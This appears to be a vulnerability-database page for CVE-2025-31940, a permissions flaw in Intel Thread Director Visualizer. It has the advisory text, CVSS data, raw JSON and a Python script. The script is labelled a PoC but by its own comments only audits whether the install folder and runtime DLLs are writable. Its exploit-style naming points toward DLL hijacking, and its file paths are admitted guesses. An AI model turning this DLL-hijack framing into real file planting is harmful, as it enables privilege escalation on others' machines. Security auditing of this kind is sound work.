Security Vulnerability Report
CVE-2025-31940 CVSS 6.7 MEDIUM

CVE-2025-31940

Published: 2025-11-11 17:15:48
Last Modified: 2026-04-15 00:35:42

Description

Incorrect default permissions for some Intel(R) Thread Director Visualizer software before version 1.1.1 within Ring 3: User Applications may allow an escalation of privilege. Unprivileged software adversary with an authenticated user combined with a high complexity attack may enable escalation of privilege. This result may potentially occur via local access when attack requirements are present without special internal knowledge and requires active user interaction. The potential vulnerability may impact the confidentiality (high), integrity (high) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts.

CVSS Details

CVSS Score
6.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Intel Thread Director Visualizer < 1.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
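# CVE-2025-31940 PoC - Intel Thread Director Visualizer Permission Escalation
# Note: This PoC demonstrates the vulnerability concept for authorized testing only
#
# What this script actually does: it audits whether the *current* user can
# write to the product's install directory and to files inside it (CWE-276,
# incorrect default permissions). It never replaces, plants or loads a file.
# Run it as the unprivileged account being assessed; a run from an elevated
# session says nothing about what a standard user can do.
# Per the advisory text, versions before 1.1.1 are affected.
import os
import sys
import ctypes
import subprocess
import tempfile
from pathlib import Path

# NOTE(review): these locations and the file names below are the PoC author's
# guesses; the advisory does not list them. Confirm against a real install.
_DEFAULT_INSTALL_PATHS = (
    r"C:\Program Files\Intel\Thread Director Visualizer",
    r"C:\Program Files (x86)\Intel\Thread Director Visualizer",
    os.path.expanduser(r"~\AppData\Local\Programs\Intel\Thread Director Visualizer"),
)
_CRITICAL_FILES = ("ThreadDirectorVisualizer.exe", "config.dat", "driver.dll")
_TARGET_EXE = "ThreadDirectorVisualizer.exe"
# Runtime DLLs the original PoC looks for beside the executable.
_RUNTIME_DLLS = (
    "msvcr120.dll",
    "msvcp120.dll",
    "vcruntime140.dll",
    "concrt140.dll",
    "vccorlib140.dll",
)


def _running_elevated():
    """Return True when the process appears to have administrative rights."""
    if os.name == "nt":
        try:
            return bool(ctypes.windll.shell32.IsUserAnAdmin())
        except (AttributeError, OSError):
            return False
    geteuid = getattr(os, "geteuid", None)
    return geteuid is not None and geteuid() == 0


def _directory_writable(directory):
    """Return True if the current user can create a file in *directory*.

    A uniquely named temporary file is used so the probe cannot overwrite an
    existing file and is removed even if a later step fails.
    """
    try:
        with tempfile.NamedTemporaryFile(dir=directory, prefix="acl_probe_", suffix=".tmp"):
            return True
    except OSError:
        return False


def _file_writable(file_path):
    """Return True if *file_path* exists and can be opened for writing.

    The file is opened write/append without O_CREAT and closed immediately:
    nothing is created, truncated or written. A real open is used instead of
    os.access() because on Windows os.access(..., os.W_OK) reflects the
    read-only attribute rather than the ACL, which produces false positives.
    A file locked by a running process is reported as not writable.
    """
    try:
        handle = os.open(file_path, os.O_WRONLY | os.O_APPEND)
    except OSError:
        return False
    os.close(handle)
    return True


def check_vulnerable_install(install_paths=None):
    """Check if Intel Thread Director Visualizer is installed with vulnerable permissions.

    Args:
        install_paths: optional iterable of directories to audit. Defaults to
            the three locations hard-coded by the original PoC.

    Returns:
        A list of findings, each ``{"path": dir, "file": name, "vulnerable": True}``.
        ``file`` is ``"."`` when the install directory itself is writable,
        which is reported even when none of the expected files are present.
        Files are probed whether or not the directory is writable, because a
        file ACL can be weaker than the ACL of its directory.
    """
    candidates = _DEFAULT_INSTALL_PATHS if install_paths is None else install_paths
    findings = []
    for install_path in candidates:
        if not os.path.isdir(install_path):
            continue
        if _directory_writable(install_path):
            findings.append({"path": install_path, "file": os.curdir, "vulnerable": True})
        for filename in _CRITICAL_FILES:
            if _file_writable(os.path.join(install_path, filename)):
                findings.append({"path": install_path, "file": filename, "vulnerable": True})
    return findings


def exploit_via_dll_hijacking(vulnerable_path, malicious_dll_path):
    """Report whether a runtime DLL beside the executable is writable.

    Despite its name this function changes nothing on disk: it only checks
    whether one of the listed DLLs exists in *vulnerable_path* and is writable
    by the current user. It does not verify that the application loads the
    DLL from that directory, so a True result is an indicator to investigate,
    not proof of exploitability.

    Args:
        vulnerable_path: install directory to inspect.
        malicious_dll_path: unused; kept so existing callers keep working.

    Returns:
        True if a writable DLL from the list was found, otherwise False
        (including when the executable is missing).
    """
    target_exe = os.path.join(vulnerable_path, _TARGET_EXE)
    if not os.path.exists(target_exe):
        print("[-] Target executable not found")
        return False

    for dll_name in _RUNTIME_DLLS:
        target_dll = os.path.join(vulnerable_path, dll_name)
        if _file_writable(target_dll):
            print(f"[*] Found writable DLL: {target_dll}")
            # The original message asserted exploitability that this check
            # does not establish; state the finding and the fix instead.
            print("[*] Risk: a standard user can modify a DLL beside the executable; "
                  "remove write access for non-administrators")
            return True
    return False


def main():
    """Audit the default install locations and print the findings."""
    print("=" * 60)
    print("CVE-2025-31940 Intel Thread Director Visualizer Exploitation")
    print("For authorized security testing only")
    print("=" * 60)

    if _running_elevated():
        # An administrator can write almost anywhere, so every probe would
        # succeed regardless of the ACLs a standard user is subject to.
        print("[!] Running elevated: results do not reflect a standard user's access")

    # Check for vulnerable installations
    print("\n[+] Checking for vulnerable installations...")
    vulnerable_instances = check_vulnerable_install()

    if not vulnerable_instances:
        print("[-] No vulnerable installations found")
        print("[*] Note: Vulnerability requires specific permission misconfigurations")
        return

    print(f"[+] Found {len(vulnerable_instances)} potentially vulnerable instance(s)")

    checked_paths = set()
    for instance in vulnerable_instances:
        print(f"\n[*] Installation Path: {instance['path']}")
        print(f"[*] Vulnerable File: {instance['file']}")

        # The DLL check is per directory; run it once for each install path.
        if instance['path'] not in checked_paths:
            checked_paths.add(instance['path'])
            exploit_via_dll_hijacking(instance['path'], None)

    print("\n[*] Remediation: update to version 1.1.1 or later and remove write "
          "access for non-administrative users on the install directory")
    print("[!] This is a demonstration script")
    print("[!] Actual exploitation requires additional steps and reverse engineering")


if __name__ == "__main__":
    main()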

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-31940", "sourceIdentifier": "[email protected]", "published": "2025-11-11T17:15:48.413", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect default permissions for some Intel(R) Thread Director Visualizer software before version 1.1.1 within Ring 3: User Applications may allow an escalation of privilege. Unprivileged software adversary with an authenticated user combined with a high complexity attack may enable escalation of privilege. This result may potentially occur via local access when attack requirements are present without special internal knowledge and requires active user interaction. The potential vulnerability may impact the confidentiality (high), integrity (high) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", 
"modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-276"}]}], "references": [{"url": "https://intel.com/content/www/us/en/security-center/advisory/intel-sa-01375.html", "source": "[email protected]"}]}}